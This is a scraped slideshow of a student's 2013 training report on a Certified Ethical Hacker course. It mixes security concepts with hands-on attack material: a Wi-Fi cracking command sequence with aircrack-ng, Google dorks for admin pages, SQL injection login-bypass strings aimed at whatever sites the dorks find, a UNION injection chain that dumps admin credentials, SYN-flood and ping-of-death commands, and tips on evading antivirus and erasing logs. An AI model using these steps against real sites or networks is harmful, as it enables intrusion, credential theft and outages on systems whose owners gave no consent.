Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Training Report - CEH


Published on

Published in: Internet, Technology, Education
  • Be the first to comment

Training Report - CEH

  1. 1. 2013 Raghav Bisht 11013387 7/16/2013 Report On Topic
  2. 2. SEMINAR ON INDUSTRIAL TRAINING (June-July, 2013) Certified Ethical Hacker (CEH) Submitted by Raghav Bisht 11013387 Under the Guidance of Mr. Mohit Yadav (Co-Founder & Managing Director) Discipline of CSE/IT Lovely Professional University, Phagwara June-July, 2013
  3. 3. SEMINAR ON INDUSTRIAL TRAINING (June-July, 2013) Certified Ethical Hacker (CEH) Submitted by Raghav Bisht 11013387 Under the Guidance of Mr. Mohit Yadav (Co-Founder & Managing Director) Discipline of CSE/IT Lovely Professional University, Phagwara June-July, 2013
  4. 4. I hereby declare that I have completed my six weeks summer training at Bytec0de Securities PVT. LTD from 25th May 2013 to 25th July 2013 under the guidance of Mr. Mohit Yadav. I have worked with full dedication during these six weeks and my learning outcomes fulfill the requirements of training. Name of Student: Raghav Bisht Date: 7/16/2013 Registration Number: 11013387 DECLARATION 2013
  5. 5. ―TO MY NATION INDIA AND LOVING GOD‖ I am happy to present this report to my Department of CSE/IT. I would like to acknowledge my trainer Mr. Mohit Yadav who gave me opportunity to develop my hacking skills under their roof and all the other hackers who appreciate my work and supported me till the end of my training. A special thanks to Mr. Shorty420 & p7771 (Black hat) for sharing their work experience and knowledge with me. I wish to thanks my family and friends. Without them, I could not have completed my training. I would also like to thank the people who directly or indirectly helped me on this term paper. THANKING YOU Acknowledgement 2013
  6. 6.  Organization overview  Training Objective  Course Outline  Introduction to hacking and security  Ethical hacking and IT security  Technology aspects for IT security & ethical hacking  Steps of hacking  Dos & Ddos attack  Wireless hacking  SQL Injection  Malware  Pen testing  Metasploit  Reason for choosing CEH  Gantt chart  Bibliography Index 2013
  7. 7. Bytecode is an IT certifications and training company, an authorized/accredited training center of EC-Council, there head quarter is completely based in New Delhi (INDIA), They started small IT training and certifications related operations in 1st, February 2008 with virtual lab environment and online training and In just a few years Bytecode has grown with a large number of new students, clients and partners and they have successfully trained and certified more than 15000 (fifteen thousands) students across the world. From the starting they only deliver the best quality and knowledge base solutions with a very high standard to their students, clients and partners. Bytecode believes in teamwork, with every new day the quest for acquiring new competencies continues. Forever searching, experimenting, innovating, learning, moving ahead with our sincere efforts and dedication, shaping the future, and challenging our competencies to create new opportunities, is a never-ending process in the company. They have successfully deliver training and workshop related services to the govt. departments, corporate, institutions and other giants Indian engineering colleges and schools. They highly provide the certifications and training services for giants such as:  EC-Council: Security5, CEH v8, ECSA, LPT, CHFI, CEI, ENSA  CISCO: CCNA, CCNP, CCVP, CCSP, CCIE  Redhat: RHCE, RHCA, RHCSA, RHCVA, RHCSS, RHCDS  Comptia: Security+, A+, N+, Server+, Linux+, Server+, CASP, CTP  CHECKPOINT: CCSA, CCSE  ISACA: CISM, CISA  ISC2: CISSP  Microsoft: MCSE, MCSA, MCTS, MCITP, MCPD Location: Bytecode Cyber Security (P) Limited Head Quarter : 72-B, III Floor, Main Vikas Marg, Laxmi Nagar, New Delhi - 110092 Near Nirman Vihar Metro Station ( Opp. Metro Pillar No.50 ) Organization Overview 2013
  8. 8.  Importance of information security in today’s world. Elements of security. Various phases of the Hacking Cycle. Types of hacker attacks. Hacktivism. Ethical hacking. Vulnerability research and tools. Steps for conducting ethical hacking. Computer crimes and implications. Training Objective 2013
  9. 9. 1. Introduction to Ethical Hacking 2. Foot printing 3. Scanning 4. Enumeration 5. System Hacking 6. Trojans and Backdoors 7. Sniffers 8. Denial of Service 9. Social Engineering 10. Session Hijacking 11. Hacking Web Servers 12. Web Application Vulnerabilities 13. Web-based Password Cracking Techniques 14. SQL Injection 15. Hacking Wireless Networks 16. Virus and Worms 17. Physical Security 18. Linux Hacking 19. Evading IDS, Firewalls, and Honey-pots 20. Buffer Overflows 21. Cryptography 22. Penetration Testing Course Outline 2013
  10. 10. 1. What is hacking? Hacking is a process to bypass the security mechanisms of information system or network. Hacking is done in step partly by creative thinking and partly by using different tools at a time. Or, Hacking is an unauthorized use of computer and network resources. Most people think that hackers are computer criminals. They fail to recognize the fact that criminals and hackers are two total different things. Media is responsible for this. Hackers in reality are actually good and extremely intelligent people who by using their knowledge in a constructive manner help organizations, companies, government, etc. to secure documents and secret information on the internet. So, hackers, as popularly defined, are computer experts who spend enormous amount of time trying to breach the security of networks, web servers and emails. Usually they use selection of specialist software to identify weakness, which are then exploited. The majority do it for fun and as a challenge. They’re not interested in attacking private individuals. It’s the big companies and authorities they go for. There are just two aspects of hacking that you have to worry about as a private individual. One is that your details are on various company databases, and when they are cracked, information about you can be stolen. 2. Understanding the need to hack your own systems To catch a thief, think like a thief. That’s the basis for ethical hacking. The law of averages works against security. With the increased number and expanding knowledge of hackers combined with the growing number of system Introduction to Hacking & Security 2013
  11. 11. Vulnerabilities and other unknowns, the time will come when all computer systems are hacked or compromised in some way. 3. So our overall goals as an ethical hacker should be as follows:  Hack your systems in a nondestructive fashion.  Enumerate vulnerabilities and, if necessary, prove to management that vulnerabilities exit and can be exploited.  Apply results to remove the vulnerabilities and better secure your system. 4. What is computer security? Security is process not product. The objective of computer security includes protection of information and property from theft, corruption, or natural disaster, while allowing the information and property to remain accessible use to minimize the security threads. 5. What hacker can do?  Hacker can enter any remote system to get all information without any trace.  Hack any email password, website, and take down network with help of ddos attack.  Hacker can break any password.  Hacker can call to anyone without tracing.
  12. 12. Ethical hacking & IT security requirements are different from each person, like a normal computer user want to protect their information’s from virus, etc and a student want to break his friends email accounts, college teachers accounts and valuable information’s as per their needs. System administrators want to maintain information’s safely from outside and inside attacks. Also maintain logs threads to investigate an attack. A business man wants to protect their information’s securely from outside and inside attacks, some of businessman interested in intelligence on competitors for their business benefits, following are others interests: 1. To protect the sensitive information’s in the company’s database. A company’s database will usually not just contain information about company itself, but also data about its clients and employees. As such, should malicious hackers be able to breach the system, they could very well get their hands on information involving a lot of people in one go. 2. To protect the database itself. Malicious hackers may not just steal the information in your system. To add insult to injury, they can also send viruses into your system that could very well corrupt it and wipe out everything in your database. This means the company losing a lot of very important information. 3. To protect a business interests of the company. If the database of a company is left unsecured and malicious hackers are able to gain access to the information in it, the company can very well lose the respect of its clients, partners and the business worlds. A forensic analysist want to investigate cyber cases to find out cyber criminals so he need latest technology to solve all issues in minimum time and penetration testers want to find loopholes in software’s or network services to reduce risk. A black hat hacker want to steal TOP SECRET information’s from business and military computers for different agenda, now everything is depend on information’s it may be for national security or war plans etc, like China is more interested to steel valuable information’s from USA, India, South Korea, Japan, Thailand, Vietnam, etc Ethical Hacking & IT Security 2013
  13. 13. 1. IT act / laws Each country has their own cyber law to prevent, monitor and investigate cyber crime. Now a day’s cyber criminal understands the complexity of laws and their effects. Also some country has tight security on gateway level using their own central monitoring system like China, Russia, India, etc. India: India does not have any ―lawful interception law‖. All it has is the ―unconstitutional‖ provisions of the information technology act 2000 (through IT act 2008 amendments). Through these amendments, the cyber law of India has been made an ―instrumentality‖ of e-surveillance in India. There are no procedural safeguards that can prevent the illegal and unconstitutional e-surveillance activities in India. The only resource for Indians in such circumstances is to use ―self defense‖ and prevent the illegal and unconstitutional encroachment upon their ―civil liberties‖ like right to privacy. You can do the following: 1. Use disposable e-mails to avoid e-mail surveillance. 2. Use safeguards like TOR against illegal internet eavesdropping and sniffing. 3. Use TOR for instant messaging and mobile phones for private and secure conversation. 4. For blackberry users and those believing in a good combination of privacy and security, use pretty good privacy along with any good smart phone. This way you can have a better and e-surveillance free mobile infrastructure then the feature controversial blackberry phones. 5. Use Enigmail for encrypted emails. Recently, the United Nations declared ―right to access‖ to internet as human right. This would have a positive impact upon many human rights in cyber-space. For
  14. 14. instance, right to speech and expression, right to privacy, right to know, etc cannot be violated by the CMS project of India. United Nations must expand Human Rights Protection to many more issues. This is the real problem for the CMS project of India. We have no dedicated privacy laws in India, Data security laws in India and data protection law in India. Further, the CMS project of India is also beyond the ―Parliamentary Security‖. The cyber law of India, incorporated in the information technology act 2000, was drastically amended through the information technology amendment act 2008. The IT act 2008 incorporated various ―unconstitutional provisions‖ in the cyber law of India that clearly violates the human rights in cyberspace. For instance, provisions regarding internet censorship, website blocking, encryption and decryption, etc have no inbuilt ―procedural safeguards‖ as mandated by the constitution of India. This is the reason why the cyber law of India needs to be repealed. Further we have no E-Surveillance policy in India. Even phone tapping in India is done in an ―Unconstitutional manner‖ and even by private individuals with or without governmental approval. If CMS project of India has to be legal has to be ―legal and constitutional‖ it must be subject to ―parliamentary oversight‖. Further, the IT act 2000 must be repealed as soon as possible as it is clearly not in conformity with the constitution of India and civil liberties protection in cyberspace. The golden shield project colloquially referred to as the great firewall of china is a censorship and surveillance project operated by the ministry of public security division of the government of the people’s republic of china. The project was initiated in 1998 and began operations in November 2003. ―Individuals are prohibited from using the internet to: harm national security; disclose state secrets; or injure the interests of the state or society. Users are prohibited from using the internet to create, replicate, retrieve, or transmit information that in-cities resistance to the PRC Constitutions, laws, or administrative regulations; promotes the overthrow of the government or socialist system; undermines national unification; distorts the truth, spreads rumors, or
  15. 15. destroys social order; or provides sexually suggestive material or encourages gambling, violence, or murder. Users are prohibited from engaging in activities that harm the security of computer information networks and from using networks or changing network resources without prior approval‖ Purpose of the project is to block content by preventing IP address from being routed through and consist of standard firewalls and proxy server at the internet gateways. Through DNS cache poisoning it’s possible to make unreachable specific website are requested. In Oct. 2001, Greg Walton of the International centre for human rights and domestic development published a report; he wrote: Old style censorship is being replaced with a massive, ubiquitous architecture of surveillance: the Golden Shield. Ultimately, the aim is to integrate a gigantic online database with an all-encompassing surveillance network-incorporating speech and face recognition, closed-circuit television, smart cards, credit records, and Internet surveillance technologies. China has implemented most sophisticated Internet content filtering that is able to effectively filter content using multiple methods of regulation and technical controls: 1. IP blocking and content filtering 2. DNS and URL filtering 3. DNS poisoning This is a real battle in the cyber space that involves the world’s largest online population and weapon created by Chinese government is an advanced Internet censorship? We can categorize the censored content as 1. Websites belonging to outlawed or suppressed groups 2. Sites related to the hostiles government, media, or other organizations deemed as subversive 3. Sites related to religious content any pornography websites or sites that encourage criminal activity
  16. 16. 4. Blogging sites The Chinese model is a reference for all the others authoritarian regimes but not only for them. We are assisting to a challenge engaged by governments worldwide like USA that desire to legislate cyber space and impose their control to prevent any form of terrorism and dissents. We are observing a growing trend toward internet censorship in a range of countries that are investing in the necessary technology to implement the control. The technologies are exactly the same used to secure network infrastructure from attack. Some commonly used technical methods for censoring are: 1. IP blocking IP blocking is a form of security used on mail, Web or any other Internet servers to block connections from a specific IP address or range of addresses that are considered undesirable or hostile. For example, a Web site forum administrator who sees spam or unwanted posts from a user may block that user's IP address to prevent them from using the discussion board. Blacklist: In Internet terminology, a generic name for a list of e-mail addresses or IP addresses that are originating with known spammers. Individuals and enterprises can use blacklists to filter out unwanted e-mails, as most e-mail applications today have filtering capabilities. 2. DNS filtering and redirection Doesn’t resolve domain names, or returns incorrect IP addresses. This affects all IP protocols such as HTTP, FTP, or POP. A typical circumvention method is to find a domain name server that resolve domain names correctly, but domain name servers are subject to blockage as well, especially IP blocking. Another workaround is to bypass DNS if the IP address is obtainable from another sources and it not blocked. Examples are modifying the hosts file or typing the IP address instead of the domain name in a web browser.
  17. 17. 3. URL filtering Suppose you type the name of your favorite social networking site on the web browser and it displays a message like ―The policy of this organization doesn’t allow you to browse that website‖ and does not let you access the site from office, there is a URL filter that has been put in place by your IT department. So, a URL filter is used to basically categorize the websites on the internet and either allow/block the access to them to the web users of the organization either by referring to an already categorized central database (maintained by URL filtering vendors) or by classifying the websites in real time. URL filtering can also be made applicable only during certain times of a day or days of a week, if required. Why is URL Filtering required? URL filtering is required to stop the users of an organization from accessing those websites during working hours that: Drains their productivity Lets them view objectionable content from work place Is bandwidth intensive and hence creates a strain on resources 4. Packet filtering On the Internet, packet filtering is the process of passing or blocking packets at a network interface based on source and destination addresses, ports, or protocols. The process is used in conjunction with packet mangling and Network Address Translation (NAT). Packet filtering is often part of a firewall program for protecting a local network from unwanted intrusion. In a software firewall, packet filtering is done by a program called a packet filter. The packet filter examines the header of each packet based on a specific set of rules, and on that basis, decides to prevent it from passing (called DROP) or allow it to pass (called ACCEPT).
  18. 18. Story: ―In real war a solder must need to understandable all weapons and there timing effect as per target to win the war in minimum time‖ Same IT security and Ethical hacking we need to break Antivirus, Firewall, IDS, and IPS for penetration testing or ethical hacking. 1.Antivirus Effective antivirus software guards your computer from all forms of malware, including traditional computer viruses, worms, Trojan horses and even sophisticated, blended attacks. Not only does antivirus software detect and eliminate any viruses or malware that may have already infected your hard drive, many solutions that offer a free virus scan actively prevent new infections before they have a chance to affect your computer. Antivirus software will scan and analyze emails and files for infection as they are downloaded. Using the method of signature-based detection, antivirus software checks a file's contents against a dictionary of known virus signatures - a pattern of code that uniquely identifies a virus. If a virus signature is found, the antivirus software will remove the threat. Antivirus software obviously detects potential threats in a few different ways. But what about the latest and greatest viruses? Because people create new viruses every day, an antivirus program will constantly update its dictionary of virus signatures. Many antivirus software programs -- including those that offer free virus protection -- also employ heuristic analysis, which can identify variants of known malware - viruses that have been mutated or refined by attackers to create different strains. How antivirus work? Before understand how antivirus work, first we need to understand how program work in computer OS. Technology aspect for IT security & ethical hacking 2013
  19. 19. Each program is code of instructions for processing inputs/outputs. The final form of code in zero/one (Binary Language). Antivirus company build team and list of known RAT and virus builders and create executable files and found the most common part of each executable that always same by program, so antivirus company build signature database and used by antivirus engine to prevent known VIRUS. For Unknown antivirus used behavior pattern they check the behavior like date of modification-file, installation location, visibility type, etc and block them as per rating system like Norton SONAR is great example. How to bypass antivirus? To bypass antivirus we need to build new RAT or virus using own coding else we need to modify exciting code using crypter, binders, packers, etc.
  20. 20. 2.Firewall Firewall is second pyramiding of IT security unauthorized or unwanted communications between computer networks or hosts. A firewall is a set of related programs, located at a network gateway server that protects the resources of a private network from users from other networks. (The term also implies the security policy that is used with the programs.) An enterprise with an intranet that allows its workers access to the wider Internet installs a firewall to prevent outsiders from accessing its own private data resources and for controlling what outside resources its own users have access to. Basically, a firewall, working closely with a router program, examines each network packet to determine whether to forward it toward its destination. A firewall also includes or works with a proxy server that makes network requests on behalf of workstation users. A firewall is often installed in a specially designated computer separate from the rest of the network so that no incoming request can get directly at private network resources. There are a number of firewall screening methods. A simple one is to screen requests to make sure they come from acceptable (previously identified) domain name and Internet Protocol addresses. For mobile users, firewalls allow remote access in to the private network by the use of secure logon procedures and authentication certificates. A number of companies make firewall products. Features include logging and reporting, automatic alarms at given thresholds of attack, and a graphical user interface for controlling the firewall. Computer security borrows this term from firefighting, where it originated. In firefighting, a firewall is a barrier established to prevent the spread of fire. What does firewall do? A firewall filters both inbound and outbound traffic. It can also manage public access to private networked resources such as host applications. It can be used used
  21. 21. to log all attempts to enter the private network and trigger alarms when hostile or unauthorized entry is attempted. Firewall can filter packets based on their source And destination addresses and port numbers. This is known as address filtering. Firewall can also filter specific type of network traffic. This is also known as protocol filtering because the decision to forward or reject traffic is dependent upon the protocol used, for example HTTP, ftp or telnet. Firewalls can also filter traffic by packet attribute or state. 3.IDS (Intrusion Detection System) An intrusion detection system (IDS) monitors network traffic and monitors for suspicious activity and alerts the system or network administrator. In some cases the IDS may also respond to anomalous or malicious traffic by taking action such as blocking the user or source IP address from accessing the network. IDS come in a variety of ―flavors‖ and approach the goal of detecting suspicious traffic in different ways. There are network based (NIDS) and host based (HIDS) intrusion detection systems. There are IDS that detect based on looking for specific signatures of known threats- similar to the way antivirus software typically detects and protects against malware- and there are IDS that detect based on comparing traffic patterns against a baseline and looking for anomalies. There are IDS that simply monitor and alert and there are IDS that perform an action or actions in response to a detected threat. We’ll cover each of these briefly.
  22. 22. There are three main types of IDS: 1. NIDS (Network Intrusion Detection System) Network Intrusion Detection Systems are placed at a strategic point or points within the network to monitor traffic to and from all devices on the network. Ideally you would scan all inbound and outbound traffic; however doing so might create a bottleneck that would impair the overall speed of the network. 2. HIDS (Host-based Intrusion Detection System) Host Intrusion Detection Systems are run on individual hosts or devices on the network. A HIDS monitors the inbound and outbound packets from the device only and will alert the user or administrator of suspicious activity is detected 3. SIDS (Stack-based Intrusion Detection System) A signature based IDS will monitor packets on the network and compare them against a database of signatures or attributes from known malicious threats. This is similar to the way most antivirus software detects malware. The issue is that there will be a lag between a new threat being discovered in the wild and the signature for detecting that threat being applied to your IDS. During that lag time your IDS would be unable to detect the new threat. 4. Anomaly Based An IDS which is anomaly based will monitor network traffic and compare it against an established baseline. The baseline will identify what is ―normal‖ for that network- what sort of bandwidth is generally used, what protocols are used, what ports and devices generally connect to each other- and alert the administrator or user when traffic is detected which is anomalous, or significantly different, than the baseline.
  23. 23. 5. IPS (Intrusion prevention system) Intrusion prevention is a preemptive approach to network security used to identify potential threats and respond to them swiftly. Like an intrusion detection system (IDS), an intrusion prevention system (IPS) monitors network traffic. However, because an exploit may be carried out very quickly after the attacker gains access, intrusion prevention systems also have the ability to take immediate action, based on a set of rules established by the network administrator. For example, an IPS might drop a packet that it determines to be malicious and block all further traffic from that IP address or port. Legitimate traffic, meanwhile, should be forwarded to the recipient with no apparent disruption or delay of service. According to Michael Reed of Top Layer Networks, an effective intrusion prevention system should also perform more complex monitoring and analysis, such as watching and responding to traffic patterns as well as individual packets. "Detection mechanisms can include address matching, HTTP string and substring matching, generic pattern matching, TCP connection analysis, packet anomaly detection, traffic anomaly detection and TCP/UDP port matching." Broadly speaking, an intrusion prevention system can be said to include any product or practice used to keep attackers from gaining access to your network, such as firewalls and anti-virus software.
  24. 24. 1.Information gathering This is a first step of hacking and penetration testing attack; first we collect all information’s of target with help of tools and manual ways. Without much information our success rate of attacks also low. Manual Process: 1. Get URL using Google search. 2. Using whois sites. 5. 6. 7. 3. Get PDF and Document using Google special features: 8. CISSP 9. inurl:hack 10. Chemistry filetype:doc 11. nce.html Automated Process: 1. We use following tools for information gathering: 12. Uberharvest 13. 14. metaGooFii 15. Web Data Extractors ( Email-Phone no Extractors ) 16. Maltego 2. People Search:     Social networking sites (facebook, linedin, twitter) Steps of Hacking 2013
  25. 25.  Job Sites [,, ] 3. Phone Number    4. Trace route Tools  Vtrace [ ]  Trout [ ]  tracert , traceroute [ commands ] 5. Email IP Tracking     2.Scanning & Banner Grabbing After getting information of target user we need to know OS type, version of application that are running on open PORTS etc to successful exploitation. Following tools we need to use: 1. Port & network scanning: Port and networking scanning is used to know open port and active Pc in network.  Nmap  Angry IP scanner  Hping 2. Banner Grabbing:
  26. 26. Banner grabbing is a process to know exact version of target application to search loopholes or exploits or zero day.  Telnet  ID serve 3.Vulnerability Scanning This step is used to find out loopholes in applications using tools, after we use public and private exploit to enter on target system remotely. Vulnerability scanner:  Acunetix  netsparke  nessus  gfi languard  Whatweb [ Find out web application ][ Backtrack Tool ] E.g.: ./whatweb  zoomscan [ scan zoomla website ] [ /pentest/web/zoomscan ] E.g.: ./ -u  Nikto: E.g. ./ -host  Websecurifi  Vega  w3af  webshag After find out vulnerability we look for exploit we need to compile those using their associated language and change shell code if required for connect back.
  27. 27. 4.Exploitation (Obtaining access) Program exploitation is a staple of hacking. A program is made up of a complex set of rules following a certain execution flow that ultimately tells the computer what to do. Exploiting a program is simply a clever way of getting the computer to do what you want it to do, even if the currently running program was designed to prevent that action. Since a program can really only do what it’s designed to do, the security holes are actually flaws or oversights in the design of the program or the environment the program is running in. It takes a creative mind to find these holes and to write programs that compensate for them. Sometimes these holes are the products of relatively obvious programmer errors, but there are some less obvious errors that have given birth to more complex exploit techniques that can be applied in many different places. 5.Maintaining access & erasing evidence This is post phase to maintain future access on target system. We need to deploy malware as per our requirement else we need to erase logs and evidence or use offshore VPS for whole operations.
  28. 28. 1.Dos Attack A "denial-of-service" attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service. Examples include  attempts to "flood" a network, thereby preventing legitimate network traffic  attempts to disrupt connections between two machines, thereby preventing access to a service  attempts to prevent a particular individual from accessing a service  attempts to disrupt service to a specific system or person It is an attempt to make a machine or network resource unavailable to its intended users. Consuming all resources given to person. Like Network bandwidth , all Type Of Memory etc.  Ping Of Death o ping -t -l 6550 [ max buffer size = 65500 ] o Effective system [ Solaris 2.4 , minix , win3.11,95 ]  SYN-ATTACK o Hping -i sudo hping3 -i u1 -S -p 80  UDP/HTTP/TCP Flooding o LOIC o HOIC Dos & Ddos Attacks 2013
  29. 29.  Smurf Attack o make your own packet and flood on network  pktbuilder  packETH 1.6 (linux & windows)  CDP Flooding (Cisco Discovery Protocol) o yersinia [ backtrack ] o Done on Cisco Switches & Routers  MAC Flooding o Flooding network switches o ARP Spoofing o Net cut [ Windows ] o ettercap [ Backtrack ] o Deauthentication Technique 2.Ddos Attack DDOS, short for Distributed Denial of Service, is a type of DOS attack where multiple compromised systems -- which are usually infected with a Trojan -- are used to target a single system causing a Denial of Service (DoS) attack. Victims of a DDoS attack consist of both the end targeted system and all systems maliciously used and controlled by the hacker in the distributed attack. According to this report on e-Security Planet, in a DDoS attack, the incoming traffic flooding the victim originates from many different sources – potentially hundreds of thousands or more. This effectively makes it impossible to stop the attack simply by blocking a single IP address; plus, it is very difficult to distinguish legitimate user traffic from attack traffic when spread across so many points of origin.
  30. 30. Distribution of attack techniques: January 2013 Distribution of attack techniques: April 2013
  31. 31. Wireless networks broadcast their packets using radio frequency or optical wavelengths. A modern laptop computer can listen in. Worse, an attacker can manufacture new packets on the fly and persuade wireless stations to accept his packets as legitimate. The step by step procedure in wireless hacking can be explained with help of different topics as follows:- 1. Stations and Access Points :- A wireless network interface card (adapter) is a device, called a station, providing the network physical layer over a radio link to another station. An access point (AP) is a station that provides frame distribution service to stations associated with it. The AP itself is typically connected by wire to a LAN. Each AP has a 0 to 32 byte long Service Set Identifier (SSID) that is also commonly called a network name. The SSID is used to segment the airwaves for usage. 2. Channels :- The stations communicate with each other using radio frequencies between 2.4 GHz and 2.5 GHz. Neighboring channels are only 5 MHz apart. Two wireless networks using neighboring channels may interfere with each other. 3. Wired Equivalent Privacy (WEP) :- It is a shared-secret key encryption system used to encrypt packets transmitted between a station and an AP. The WEP algorithm is intended to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. WEP encrypts the payload of data packets. Management and control frames are always transmitted in the clear. WEP uses the RC4 encryption algorithm. 4. Wireless Network Sniffing :- Sniffing is eavesdropping on the network. A (packet) sniffer is a program that intercepts and decodes network traffic broadcast through a medium. It is easier to sniff wireless networks than wired ones. Sniffing can also help find the easy kill as in scanning for open access points that allow anyone to connect, or capturing the passwords used in a connection session that does not even use WEP, or in telnet, rlogin and ftp connections. Wireless hacking 2013
  32. 32. Steps for hacking Wi-Fi:  airmon-ng start wlan0  airodump-ng mon0  airodump-ng --bssid 0C:D2:B5:01:AB:70 -c 12 -w bytecodelab mon0  aireplay-ng -c <STATION> -0 500 -a 0C:D2:B5:01:AB:70 mon0  aircrack-ng bytecodelab.cap
  33. 33. 1.What is Sql injection attack? A SQL Injection attack is a form of attack that comes from user input that has not been checked to see that it is valid. The objective is to fool the database system into running malicious code that will reveal sensitive information or otherwise compromise the server. SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a Web application for execution by a backend database. Attackers take advantage of the fact that programmers often chain together SQL commands with user-provided parameters, and can therefore embed SQL commands inside these parameters. The result is that the attacker can execute arbitrary SQL queries and/or commands on the backend database server through the Web application. 1.MYSQL Injection  Dorks Code o inurl:admin.asp o inurl:login/admin.asp o inurl:admin/login.asp o inurl:adminlogin.asp o inurl:adminhome.asp o inurl:admin_login.asp o inurl:administrator_login.asp I am going to use: Code:  Logging Now you can find some site over these dorks and try to log in with: Username: Admin Password: password' or 1=1-- Instead of password' or 1=1 you can use some of these: Code: 'or'1'='1 ' or '1'='1 ' or 'x'='x ' or 0=0 -- " or 0=0 -- Sql Injection 2013
  34. 34. or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a 'or'1=1' Password ’ or 1=1 will the confuse server and will let you log in. So if you are able to log in, site is vulnerable and you are going to be able to use admin panel. 2.Advance Sql injection Eg. Of advance Sql injection: Target :  order by 100  order by 10  order by 20  order by 50  order by 40  order by 30  order by 35  order by 33  order by 32  order by 31  union select by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31  union select by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31—  union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31—  union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31—  union select 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31—
  35. 35.  union select 1,2,group_concat,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31—  union select 1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31—  union select 1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31—  union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31 from information_schema.tables where table_schema = database()—  union select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31 from information_schema.columns where table_name = 0x6e675f61646d696e—  union select 1,2,group_concat(id,0x3a,loginid,0x3a,email,0x3a,password,0x3a,name,0x3a,type,0x3a), 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from ng_admin—    Tool used for Sql injection are:  Havij v1.15  Sql map  Bsql hacker  Pangolin  Absinthe
  36. 36. This is a big catchall phrase that covers all sorts of software with nasty intent. Not buggy software, not programs you don’t like, but software which is specifically written with the intent to harm. Virus: This is a specific type of malware that spreads itself once it’s initially run. It’s different from other types of malware because it can either be like a parasite that attaches to good files on your machine, or it can be self-contained and search out other machines to infect. Worm: Think of inchworms rather than tapeworms. These are not parasitic worms, but the kind that move around on their own. In the malware sense, they’re viruses that are self-contained (they don’t attach themselves like a parasite) and go around searching out other machines to infect. Trojan: Do you remember that story you had to read in high school about the big wooden horse that turned out to be full of guys with spears? This is the computer equivalent. You run a file that is supposed to be something fun or important, but it turns out that it’s neither fun nor important, and it’s now doing nasty things to your machine. Malware 2013
  37. 37. Introduction: 1. What is penetration testing? A penetration testing is a method of evaluating the security of a computer system or a network by simulating an attack from a malicious source, known as black hat hackers, or crackers. The process involves an active analysis of the system from any potential vulnerabilities that may result from poor or improper system configuration, known and/or unknown hardware or software flaws, or operational weakness in process or technical countermeasures. 2. Why conduct a penetration testing? From a business perspective, penetration testing helps safeguard your organization against failure, through:  Preventing financial loss through fraud or through lost revenue due to unreliable business system and processes.  Proving due diligence and compliance to your industry regulators, customers and shareholders.  Protecting your brand by avoiding loss of consumer confidence and business reputation. Penetration Testing 2013
  38. 38. 3. What can be tested? All part where organization captures, store and processes information can be assessed like the system where the information is stored in, the transmission channels that transport it, and the processes and personnel that manages it, Examples of areas that are commonly tested are:  Operating system, applications, database, networking equipments etc.  Dynamic websites, in-house applications etc.  Telephony (war-dialing, remote access etc.)  Personnel (screening process, social engineering etc.)  Physical (access controls, dumpster diving etc.)  Wireless (wifi, Bluetooth, IR, GSM, RFID etc.) 4. What is a process of penetration testing? Penetration testing has a vulnerability assessment part also. In pen test we launch attack and in VA (vulnerability assessment) we only test for vulnerability by automated VA tools like Nikto, nessus, acunetix etc. Steps of advanced penetration testing: Penetration Testing Automated VA by Tools Manual Using: Metasploit
  39. 39. 1. If we want to do pen test on any website like, we need DNS Records from & whois records and other type of information this part is known as Information Gathering. 2. After we use backtrack operating system (also known as pen-testing OS for security experts) toolkit for auto pen-testing with help of free tools like: Nikto, Privoxy, Nessus, Samurai etc. 3. Make report for all found vulnerabilities and cross verify. 4. Use commercial software’s like: Core Impact, Canvas, Qualys Guard, Xcobra, NTOSpider, KSES, AppScan, Webinspect, Brupsuite, Acunetix WVS etc. 5. Make report for new vulnerabilities. 6. After we will start manual pen-testing with help of Metasploit & Reverse eng tools. 7. Find vulnerabilities and take screen shots for Proof-Of-Concept create custom report. 8. Forward Custom Report to company.
  40. 40. 1. What is Metasploit? The Metasploit project is an open-source, computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit framework, a tool for developing and executing exploit code against a remote target machine. Other important sub projects include the op- code Database, shell code archive, and security research. Metasploit is a best hacking framework for local and remote hacking done in an easy way. Metasploit Terms: Exploit  to take advantage of a security flaw within a system, network, or application. Payload  is code that our victim computer to execute by the Metasploit framework. Module  a small piece of code that can be added to the Metasploit framework to execute an attack. Shell-code  a small piece of code used as a payload. MSFconsole: MSFconsole is an all-in-one interface to most of the features in Metasploit. MSFconsole can be used to launch attacks, creating listeners, and much, much more. Metasploit comes installed by default on backtrack 5. To access MSFconsole, open your console and type: Metasploit 2013
